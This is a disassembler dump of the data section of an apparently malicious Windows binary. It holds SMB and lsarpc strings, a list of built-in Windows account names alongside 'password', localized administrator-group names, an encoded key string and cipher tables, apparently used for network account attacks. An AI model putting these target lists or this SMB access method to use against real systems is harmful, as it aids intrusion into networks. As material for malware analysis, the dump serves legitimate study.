db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 2 dup(31h), 78h
db 57h ; W
db 34h, 12h, 34h
db 12h
db 0CDh, 0ABh, 0EFh
db 0
db 1, 23h, 45h
db 67h ; g
db 89h, 0ABh, 0
db 0
db 2 dup(0), 5Ch
aLsarpc db 'lsarpc',0
aSmbserverIpc db '\\*SMBSERVER\IPC$',0
db 41h, 64h, 6Dh
aInistrator db 'inistrator',0 ; DATA XREF: sub_409C10+13�o
aPassword db 'password',0
aS_1 db '\\%s',0
aKrbtgt db 'krbtgt',0
aSupport_388945 db 'SUPPORT_388945a0',0
aTelnetclients db 'TelnetClients',0
aHelpassistant db 'HelpAssistant',0
aHelpservicesgr db 'HelpServicesGroup',0
aTsinternetuser db 'TsInternetUser',0
aSqldebugger db 'SQLDebugger',0
aSqlserver db 'SQLServer',0
aSqlagentcmdexe db 'SQLAgentCmdExec',0
aNetshowservice db 'NetShowServices',0
aAspnet db 'ASPNET',0 ; DATA XREF: .data:0041B7E8�o
; .data:0041BBD8�o
aVusr db 'VUSR',0
aIls_ db 'ILS_',0
aIis_ db 'IIS_',0
aIusr_ db 'IUSR_',0
aIwam_ db 'IWAM_',0
aOws_ db 'OWS_',0
aAspnet_0 db 'ASPNET',0
aDhcp db 'DHCP',0
aWins db 'WINS ',0 ; DATA XREF: .data:0041B7E0�o
; .data:0041B7EC�o
aWeb db 'WEB ',0
aPop3 db 'POP3 ',0
aSql db 'SQL',0
asc_419EE4 db '$',0 ; DATA XREF: .data:0041B7F4�o
a?? db '??',0
aVmware db 'vmware',0
aGroup db '-group',0
aUser db '-user',0
aAuthors db ' Authors',0
aAdmins db ' Admins',0
aBrowsers db ' Browsers',0
aGuests db ' Guests',0
aUsers db ' Users',0
aDevelopers db ' Developers',0
aAdministrators db ' Administrators',0
dd offset dword_41840C+5
dd offset dword_41840C+0Ch
dd offset dword_41840C+1Dh
dd offset dword_41840C+2Bh
dd offset dword_41840C+39h
dd offset dword_41840C+4Bh
dd offset dword_41840C+5Ah
dd offset dword_41840C+66h
dd offset dword_41840C+70h
dd offset dword_41840C+80h
dd offset dword_41840C+90h
align 10h
dd 2 dup(0)
dd 0A3000000h, 0A8004184h, 0AD004184h, 0B2004184h, 0B8004184h
dd 0C3004184h, 0BE004184h, 0CA004184h, 0CF004184h, 0D5004184h
dd 0DA004184h, 0E0004184h, 0E4004184h, 0E6004184h, 0E9004184h
dd 0F0004184h, 0F7004184h, 4184h, 2 dup(0)
dd 0FD000000h, 6004184h, 0E004185h, 18004185h, 20004185h
dd 27004185h, 33004185h, 4185h, 2 dup(0)
dd 4E000000h, 6E006F00h
db 0, 65h, 0
byte_419FFB db 0 ; DATA XREF: rdata:loc_40F83B�o
dd 6F004400h, 61006D00h, 6E006900h, 55002000h, 65007300h
dd 73007200h
db 2 dup(0)
dword_41A016 dd 65004700h ; rdata:0040F8F1�r
word_41A01A dw 6500h ; DATA XREF: .data:0041BCFC�o
dd 6E00h, 6F004400h, 65006D00h, 6E006900h, 65006700h, 72006200h
dd 69007500h, 65006B00h, 73007200h, 41000000h, 63007500h
dd 6E007500h, 49000000h, 76006E00h, 0E9006900h, 20007300h
dd 75006400h, 64002000h, 6D006F00h, 69006100h, 65006E00h
dd 4B000000h, 69006500h, 6E00h, 6F004400h, 0E4006D00h
dd 65006E00h, 2D006E00h, 65004200h, 75006E00h, 7A007400h
dd 72006500h, 53000000h, 6E006500h, 69006B00h, 54000000h
dd 72006100h, 6F007400h, 0E1006D00h, 79006E00h, 65006600h
dd 68006C00h, 73006100h, 6E007A00h, 6C00E100h, 6B00F300h
dd 4E000000h, 73006500h, 75007300h, 6F006E00h, 6A000000h
dd 305730h, 4CC5C600h, 420000C7h, 61007200h, 6B00h, 7C005500h
dd 74007901h, 6F006B00h, 6E007700h, 63006900h, 20007900h
dd 6F006400h, 65006D00h, 79006E00h, 4E000000h, 6E006500h
dd 75006800h, 6D00h, 73005500h, 0E1007500h
db 0, 72h
word_41A13A dw 6900h ; DATA XREF: rdata:0040F76A�o
dd 73006F00h, 64002000h, 20006F00h, 6F006400h, 0ED006D00h
dd 69006E00h, 6F00h, 74005500h, 6C006900h, 7A006900h, 64006100h
dd 72006F00h, 73006500h, 64002000h, 20006F00h, 6F006400h
dd 0ED006D00h, 69006E00h, 6F00h, 42041E00h, 43044104h
dd 41044204h
db 4
byte_41A195 db 42h, 4, 32h ; DATA XREF: rdata:loc_40F734�o
; sub_40FC26+2B�o ...
dd 35044304h, 44204h, 3E041F00h, 4C043B04h, 3E043704h
dd 30043204h, 35044204h, 38043B04h, 34002004h, 3C043E04h
dd 3D043504h, 43004h, 69004E00h, 67006E00h
dd 6E007500h, 6F00h, 73005500h, 61007500h, 69007200h, 73006F00h
; DATA XREF: .data:off_41BC38�o
dd 64002000h, 6C006500h, 64002000h, 6D006F00h, 6E006900h
dd 6F006900h, 49000000h, 67006E00h, 6E006500h, 44000000h
dd 6D006F00h, 6E00E400h, 6E006100h, 0E4007600h, 64006E00h
dd 72006100h, 6500h, 6F005900h, 6B00h, 90004100h, 0B70012F6h
dd 0A80048B3h, 0EC004C30h, 80012EDh, 0F3000000h, 0FD004185h
dd 17004185h, 21004186h, 43004186h, 4F004186h, 73004186h
dd 7D004186h, 9F004186h, 0AB004186h, 0D7004186h, 0E7004186h
dd 0ED004186h, 0F3004186h, 0FD004186h, 23004186h, 31004187h
dd 59004187h, 89004187h, 0A1004187h, 0C9004187h, 0D9004187h
dd 3004187h, 0F004188h, 2D004188h, 35004188h, 4188h, 3 dup(0)
dword_41A2C0 dd 0 ; sub_40FC26+1A�r ...
dword_41A2C4 dd 0 dword_41A2C8 dd 20h dup(0) dword_41A348 dd 2 dup(0) dword_41A350 dd 9 dup(0) dword_41A374 dd 0Ch dup(0) dword_41A3A4 dd 4 dup(0) dword_41A3B4 dd 0Bh dup(0) ; .data:0041BBDC�o
dword_41A3E0 dd 4 dup(0) dword_41A3F0 dd 2 dup(0) dd 57713830h, 6B2B626Ah
dd 6B785267h, 50337455h, 4B794F65h, 76465771h ; DATA XREF: .data:off_41BC14�o
aSw0cp8xucxxq6y db 'sW0cp8XUcxxq6y43hcs+PRiHSQX+slLM9J4f7-BmzTyAa0iKRhYeNP5aZDaZhBL2',0
; DATA XREF: rdata:0040FB4C�o
align 10h
aA db '€',0 ; DATA XREF: sub_4100B1+C8�o
; sub_4100B1+DC�o ...
align 8
dword_41A468 dd 4 dup(0) ; sub_4100B1+1AC�o
dword_41A478 dd 4 dup(0) ; sub_4100B1+176�o ...
dword_41A488 dd 2 dup(0) ; sub_4100B1+2C1�o ...
dword_41A490 dd 0 ; sub_4100B1+2F2�o ...
db 2 dup(0)
word_41A496 dw 0 ; DATA XREF: sub_4100B1+1C5�o
; sub_4100B1+1DB�o
align 10h
dword_41A4A0 dd 3 dup(0) ; sub_4100B1+234�o
db 0
byte_41A4AD db 3 dup(0) ; DATA XREF: sub_4100B1+1F1�o
; sub_4100B1+211�o
dd 0
db 3 dup(0)
byte_41A4B7 db 0 ; DATA XREF: sub_4100B1+29A�o
; sub_4103F0+25B�o
dd 2 dup(0)
db 3 dup(0)
byte_41A4C3 db 0 ; DATA XREF: sub_4100B1+143�o
; sub_4103F0:loc_410543�o
dd 7 dup(0)
dword_41A4E0 dd 1Ch dup(0) dword_41A550 dd 0 align 10h
dword_41A560 dd 1Ch dup(0) dd 0E8B367A9h, 76A3FD04h, 7880929Ah, 38D1DDE4h, 9835C60Dh
dd 6CECF718h, 26377543h, 489413FAh, 308BD0F2h, 23DF5484h
dd 593D5B19h, 82A2AEF3h, 2E830163h, 7C9B51D9h, 0BEA5EBA6h
dd 61E30C16h, 0F53A8CC0h, 0B252C73h, 6B894EBBh, 0F1B46A53h
dd 45BDE6E1h, 66B6F4E2h, 560395CCh, 0D71E1CD4h, 0B58EC3FBh
dd 0BABFCFE9h, 0AF3977EAh, 7162C933h
dword_41A640 dd 0AD097981h, 0D8F9CD24h, 4DB9C5E5h, 0E7860844h, 0EDAA1DA1h
; DATA XREF: sub_410C60+1D�o
dd 0D2B27006h, 11A07B41h, 9027C231h, 0FF60F620h, 0ABB15C96h
dd 1B529C9Eh, 0EF0A935Fh, 0EE498591h, 3B8F4F2Dh, 466D8747h
db 0D6h, 3Eh, 69h
byte_41A67F db 64h ; DATA XREF: sub_410CF0+1C�o
; ---------------------------------------------------------------------------
sub cl, dh
retf
; ---------------------------------------------------------------------------
db 2Fh
dd 7A0597FCh, 1AD57FACh
db 4Bh, 0Eh, 0A7h
dword_41A68F dd 3F14285Ah ; sub_410C60+17�r
byte_41A693 db 29h ; DATA XREF: sub_410B20+90�o
dd 24C3C88h, 17B0DAB8h, 7D8A1F55h, 748DC757h, 729FC4B7h
dd 1222157Eh, 34990758h, 68DE506Eh, 0F8DBBC65h, 402BA8C8h
dd 0A432FEDCh, 0F02110CAh, 0F5DD3h, 42369D6Fh, 0E0C15E4Ah
dd 0F4C6F375h, 0C8FB7BDBh, 6BE6D34Ah, 4BE87D45h, 0FDD832D6h
dd 0E1F17137h, 1BF80F30h, 3F06FA87h, 5BAEBA5Eh, 9DBC008Ah
dd 0EB1C16Dh, 0D5D25D80h, 140784A0h, 0A32C90B5h, 544C73B2h
dd 51367492h, 5ABDB038h, 966260FCh, 10F7426Ch, 8C27287Ch
dd 0C79C9513h, 703B4624h, 0CB85E3CAh, 0B893D011h, 0FF2083A6h
dd 0CCC3779Fh, 0BF086F03h, 0E22BE740h, 82AA0C79h, 0B9EA3A41h
dd 97A49AE4h, 177ADA7Eh, 1DA19466h, 0B3DEF03Dh, 1CA7720Bh
dd 3E53D1EFh, 5F26338Fh, 492A76ECh, 21EE8881h, 0D9EB1AC4h
dd 0CD9939C5h, 18B31ADh, 1FDD2318h, 48F92D4Eh, 8E65F24Fh
dd 19585C78h, 5798E58Dh, 64057F67h, 0FEB663AFh, 0A53CB7F5h
dword_41A798 dd 4468E9CEh, 69434DE0h, 15AC2E29h, 9E0AA859h, 34DF476Eh
; DATA XREF: sub_410B20+A5�o
dd 0DCCF6A35h, 9BC0C922h, 0ABEDD489h, 520DA212h, 0A92F02BBh
dd 0B41E61D7h, 0C2F60450h, 56862516h, 91BE0955h, 0
dd 0BCBC3275h, 0ECEC21F3h, 202043C6h, 0B3B3C9F4h, 0DADA03DBh
dd 2028B7Bh, 0E2E22BFBh, 9E9EFAC8h, 0C9C9EC4Ah, 0D4D409D3h
dd 18186BE6h, 1E1E9F6Bh, 98980E45h, 0B2B2387Dh, 0A6A6D2E8h
dd 2626B74Bh, 3C3C57D6h, 93938A32h, 8282EED8h, 525298FDh
dd 7B7BD437h, 0BBBB3771h, 5B5B97F1h
dword_41A830 dd 474783E1h, 24243C30h, 5151E20Fh, 0BABAC6F8h, 4A4AF31Bh
; DATA XREF: sub_4114E0+121�o
dd 0BFBF4887h, 0D0D70FAh, 0B0B0B306h, 7575DE3Fh, 0D2D2FD5Eh
dd 7D7D20BAh, 666631AEh, 3A3AA35Bh, 59591C8Ah, 0
dd 0CDCD93BCh, 1A1AE09Dh, 0AEAE2C6Dh, 7F7FABC1h, 2B2BC7B1h
dword_41A880 dd 0BEBEB90Eh, 0E0E0A080h, 8A8A105Dh, 3B3B52D2h, 6464BAD5h
; DATA XREF: sub_411980+F1�o
dd 0D8D888A0h, 0E7E7A584h, 5F5FE807h, 1B1B1114h
dword_41A8A4 dd 2C2CC2B5h byte_41A8A8 db 90h ; DATA XREF: sub_411800+97�o
db 0B4h, 2 dup(0FCh)
dd 3131272Ch, 808065A3h, 73732AB2h, 0C0C8173h, 79795F4Ch
dd 6B6B4154h, 4B4B0292h, 53536974h, 94948F36h, 83831F51h
dd 2A2A3638h, 0C4C49CB0h, 2222C8BDh, 0D5D5F85Ah, 0BDBDC3FCh
dd 48487860h, 0FFFFCE62h, 4C4C0796h, 4141776Ch, 0C7C7E642h
dd 0EBEB24F7h, 1C1C1410h, 5D5D637Ch, 36362228h, 6767C027h
dd 0E9E9AF8Ch, 4444F913h, 1414EA95h, 0F5F5BB9Ch, 0CFCF18C7h
dd 3F3F2D24h, 0C0C0E346h, 7272DB3Bh, 54546C70h, 29294CCAh
dd 0F0F035E3h, 808FE85h, 0C6C617CBh
dword_41A944 dd 0F3F34F11h, 8C8CE4D0hdword_41A94C dd 0A4A45993h, 0CACA96B8h, 68683BA6h ; rdata:00411D2C�o ...
dword_41A958 dd 0B8B84D83h ; sub_412700+27�r ...
; ---------------------------------------------------------------------------
loc_41A95C: ; DATA XREF: sub_4111E0+B8�o
; sub_411340+BF�o
and [eax], ch
cmp [eax], bh
jmp fword ptr [esi]
; ---------------------------------------------------------------------------
db 0E5h
byte_41A963 db 0E5h ; DATA XREF: sub_4111E0+112�o
dd 0ADAD569Fh, 0B0B8477h, 0C8C81DC3h, 9999FFCCh, 5858ED03h
dd 19199A6Fh, 0E0E0A08h
dword_41A980 dd 95957EBFh, 70705040h, 0F7F730E7h, 6E6ECF2Bh, 1F1F6EE2h
; DATA XREF: sub_412C30+B�o
dd 0B5B53D79h, 9090F0Ch, 616134AAh, 57571682h, 9F9F0B41h
dd 9D9D803Ah, 111164EAh, 2525CDB9h, 0AFAFDDE4h
dword_41A9B8 dd 4545089Ah, 0DFDF8DA4h, 0A3A35C97h, 0EAEAD57Eh, 353558DAh
; DATA XREF: sub_412C30+B6�o
dd 0EDEDD07Ah, 4343FC17h, 0F8F8CB66h, 0FBFBB194h, 3737D3A1h
dd 0FAFA401Dh, 0C2C2683Dh
dword_41A9E8 dd 0B4B4CCF0h, 32325DDEh, 9C9C71B3h, 5656E70Bh, 0E3E3DA72h
; DATA XREF: sub_412C30+EB�o
dd 878760A7h, 15151B1Ch, 0F9F93AEFh, 6363BFD1h, 3434A953h
dd 9A9A853Eh, 0B1B1428Fh, 7C7CD133h, 88889B26h, 3D3DA65Fh
dd 0A1A1D7ECh
dword_41AA28 dd 0E4E4DF76h, 8181942Ah, 91910149h, 0F0FFB81h, 0EEEEAA88h
; DATA XREF: sub_412C30+13F�o
dd 161661EEh, 0D7D77321h, 9797F5C4h, 0A5A5A81Ah, 0FEFE3FEBh
dd 6D6DB5D9h, 7878AEC5h
dword_41AA58 dd 0C5C56D39h, 1D1DE599h, 7676A4CDh, 3E3EDCADh, 0CBCB6731h
; DATA XREF: sub_412C30+2ED�o
dd 0B6B6478Bh, 0EFEF5B01h, 12121E18h
dword_41AA78 dd 6060C523h, 6A6AB0DDh, 4D4DF61Fh, 0CECEE94Eh, 0DEDE7C2Dh
; DATA XREF: sub_412C30+39B�o
dd 55559DF9h, 7E7E5A48h, 2121B24Fh, 3037AF2h, 0A0A02665h
dd 5E5E198Eh, 5A5A6678h, 65654B5Ch, 62624E58h, 0FDFD4519h
dd 606F48Dh
byte_41AAB8 db 0E5h ; DATA XREF: sub_412C30+66�r
; sub_412C30+80�r
db 86h, 2 dup(40h)
dd 0F2F2BE98h, 3333AC57h, 17179067h
dword_41AAC8 dd 5058E7Fh, 0E8E85E05h, 4F4F7D64h, 89896AAFh, 10109563h
; DATA XREF: sub_412C30+269�o
dd 74742FB6h, 0A0A75FEh, 5C5C92F5h, 9B9B74B7h, 2D2D333Ch
dd 3030D6A5h, 2E2E49CEh, 494989E9h, 46467268h, 77775544h
dd 0A8A8D8E0h, 9696044Dh, 2828BD43h, 0A9A92969h, 0D9D97929h
dd 8686912Eh, 0D1D187ACh, 0F4F44A15h, 8D8D1559h, 0D6D682A8h
dd 0B9B9BC0Ah, 42420D9Eh, 0F6F6C16Eh, 2F2FB847h, 0DDDD06DFh
dd 23233934h, 0CCCC6235h, 0F1F1C46Ah, 0C1C112CFh, 8585EBDCh
dd 8F8F9E22h, 7171A1C9h, 9090F0C0h, 0AAAA539Bh, 101F189h
dd 8B8BE1D4h, 4E4E8CEDh, 8E8E6FABh, 0ABABA212h, 6F6F3EA2h
dd 0E6E6540Dh, 0DBDBF252h, 92927BBBh, 0B7B7B602h, 6969CA2Fh
dd 3939D9A9h, 0D3D30CD7h, 0A7A72361h, 0A2A2AD1Eh, 0C3C399B4h
dd 6C6C4450h, 7070504h, 4047FF6h, 272746C2h, 0ACACA716h
dd 0D0D07625h, 50501386h, 0DCDCF756h, 84841A55h, 0E1E15109h
dd 7A7A25BEh, 1313EF91h, 0A9D93939h, 67901717h, 0B3719C9Ch
dd 0E8D2A6A6h, 4050707h, 0FD985252h, 0A3658080h, 76DFE4E4h
dd 9A084545h, 92024B4Bh, 80A0E0E0h, 78665A5Ah, 0E4DDAFAFh
dd 0DDB06A6Ah, 0D1BF6363h, 38362A2Ah, 0D54E6E6h, 0C6432020h
dd 3562CCCCh, 98BEF2F2h, 181E1212h, 0F724EBEBh, 0ECD7A1A1h
dd 6C774141h, 43BD2828h, 7532BCBCh, 37D47B7Bh, 269B8888h
dd 0FA700D0Dh, 13F94444h, 94B1FBFBh, 485A7E7Eh, 0F27A0303h
dd 0D0E48C8Ch, 8B47B6B6h, 303C2424h, 84A5E7E7h, 54416B6Bh
dd 0DF06DDDDh, 23C56060h, 1945FDFDh, 5BA33A3Ah, 3D68C2C2h
dd 59158D8Dh, 0F321ECECh, 0AE316666h, 0A23E6F6Fh, 82165757h
dd 63951010h, 15BEFEFh, 834DB8B8h, 2E918686h, 0D9B56D6Dh
dd 511F8383h, 9B53AAAAh, 7C635D5Dh, 0A63B6868h, 0EB3FFEFEh
dd 0A5D63030h, 0BE257A7Ah, 16A7ACACh
dword_41ACC8 dd 0C0F0909h dword_41ACCC dd 0E335F0F0h dd 6123A7A7h, 0C0F09090h
dword_41ACD8 dd 8CAFE9E9h ; sub_4132D8+164�r ...
dword_41ACDC dd 3A809D9Dh ; sub_4132D8+175�r ...
dword_41ACE0 dd 0F5925C5Ch ; sub_4132D8+18A�r ...
dword_41ACE4 dd 73810C0Ch ; sub_4132D8+19F�r ...
dd 2C273131h, 2576D0D0h, 0BE75656h, 0BB7B9292h, 4EE9CECEh
dd 89F10101h, 6B9F1E1Eh, 53A93434h, 6AC4F1F1h, 0B499C3C3h
dd 0F1975B5Bh, 0E1834747h, 0E66B1818h, 0BDC82222h, 450E9898h
dd 0E26E1F1Fh, 0F4C9B3B3h, 0B62F7474h, 66CBF8F8h, 0CCFF9999h
dd 95EA1414h, 3ED5858h, 56F7DCDCh, 0D4E18B8Bh, 1C1B1515h
dd 1EADA2A2h, 0D70CD3D3h, 0FB2BE2E2h, 0C31DC8C8h, 8E195E5Eh
dd 0B5C22C2Ch, 0E9894949h, 0CF12C1C1h, 0BF7E9595h, 0BA207D7Dh
dd 0EA641111h, 77840B0Bh, 396DC5C5h, 0AF6A8989h, 33D17C7Ch
dd 0C9A17171h, 62CEFFFFh, 7137BBBBh, 81FB0F0Fh, 793DB5B5h
dd 951E1E1h, 0ADDC3E3Eh, 242D3F3Fh, 0CDA47676h, 0F99D5555h
dd 0D8EE8282h, 0E5864040h, 0C5AE7878h, 0B9CD2525h, 4D049696h
dd 44557777h, 80A0E0Eh, 86135050h, 0E730F7F7h, 0A1D33737h
dd 1D40FAFAh, 0AA346161h, 0ED8C4E4Eh, 6B3B0B0h, 706C5454h
dd 0B22A7373h, 0D2523B3Bh, 410B9F9Fh, 7B8B0202h, 0A088D8D8h
dd 114FF3F3h, 3167CBCBh, 0C2462727h, 27C06767h, 90B4FCFCh
dd 20283838h, 0F67F0404h, 60784848h, 0FF2EE5E5h, 96074C4Ch
dd 5C4B6565h, 0B1C72B2Bh, 0AB6F8E8Eh, 9E0D4242h, 9CBBF5F5h
dd 52F2DBDBh, 1BF34A4Ah, 5FA63D3Dh, 9359A4A4h, 0ABCB9B9h
dd 0EF3AF9F9h, 91EF1313h, 85FE0808h, 49019191h, 0EE611616h
dd 2D7CDEDEh, 4FB22121h, 8F42B1B1h, 3BDB7272h, 47B82F2Fh
dd 8748BFBFh
db 2 dup(0AEh)
word_41AE7E dw 6D2Ch ; DATA XREF: sub_408DC0+13�o
; sub_408DC0+38�o
dd 46E3C0C0h, 0D6573C3Ch, 3E859A9Ah, 6929A9A9h, 647D4F4Fh
; ---------------------------------------------------------------------------
loc_41AE94: ; DATA XREF: sub_408440+C�o
; sub_408440+34�o
add dword ptr [ecx+2E2E2A94h], 0C6C6CE49h
pop ss
retf
; ---------------------------------------------------------------------------
dd 2FCA6969h, 0FCC3BDBDh, 975CA3A3h, 55EE8E8h, 7AD0EDEDh
dd 0AC87D1D1h, 7F8E0505h, 0D5BA6464h, 1AA8A5A5h, 4BB72626h
dd 0EB9BEBEh, 0A7608787h, 5AF8D5D5h, 28223636h, 14111B1Bh
dd 3FDE7575h, 2979D9D9h, 88AAEEEEh, 3C332D2Dh, 4C5F7979h
dd 2B6B7B7h, 0B896CACAh, 0DA583535h, 0B09CC4C4h, 17FC4343h
dd 551A8484h, 1FF64D4Dh, 8A1C5959h, 7D38B2B2h, 57AC3333h
dd 0C718CFCFh, 8DF40606h, 74695353h, 0B7749B9Bh, 0C4F59797h
dd 9F56ADADh, 72DAE3E3h, 7ED5EAEAh, 154AF4F4h, 229E8F8Fh
dd 12A2ABABh, 584E6262h, 7E85F5Fh, 99E51D1Dh, 34392323h
dd 6EC1F6F6h, 50446C6Ch, 0DE5D3232h, 68724646h, 6526A0A0h
dd 0BC93CDCDh, 0DB03DADAh, 0F8C6BABAh, 0C8FA9E9Eh, 0A882D6D6h
dd 2BCF6E6Eh, 40507070h, 0DCEB8585h, 0FE750A0Ah, 328A9393h
dd 0A48DDFDFh, 0CA4C2929h, 10141C1Ch, 2173D7D7h, 0F0CCB4B4h
dd 0D309D4D4h, 5D108A8Ah, 0FE25151h, 0
dd 6F9A1919h, 9DE01A1Ah, 368F9494h, 42E6C7C7h, 4AECC9C9h
dd 5EFDD2D2h, 0C1AB7F7Fh, 0E0D8A8A8h, 0BC75BC32h, 0ECF3EC21h
dd 20C62043h, 0B3F4B3C9h, 0DADBDA03h, 27B028Bh, 0E2FBE22Bh
dd 9EC89EFAh, 0C94AC9ECh, 0D4D3D409h, 18E6186Bh, 1E6B1E9Fh
dd 9845980Eh, 0B27DB238h, 0A6E8A6D2h, 264B26B7h, 3CD63C57h
dd 9332938Ah, 82D882EEh, 52FD5298h, 7B377BD4h, 0BB71BB37h
dd 5BF15B97h, 47E14783h, 2430243Ch, 510F51E2h, 0BAF8BAC6h
dd 4A1B4AF3h, 0BF87BF48h, 0DFA0D70h, 0B006B0B3h, 753F75DEh
dd 0D25ED2FDh, 7DBA7D20h, 66AE6631h, 3A5B3AA3h, 598A591Ch
dd 0
dd 0CDBCCD93h, 1A9D1AE0h, 0AE6DAE2Ch, 7FC17FABh, 2BB12BC7h
dd 0BE0EBEB9h, 0E080E0A0h, 8A5D8A10h, 3BD23B52h, 64D564BAh
dd 0D8A0D888h, 0E784E7A5h, 5F075FE8h, 1B141B11h, 2CB52CC2h
dd 0FC90FCB4h, 312C3127h, 80A38065h, 73B2732Ah, 0C730C81h
dd 794C795Fh, 6B546B41h, 4B924B02h, 53745369h, 9436948Fh
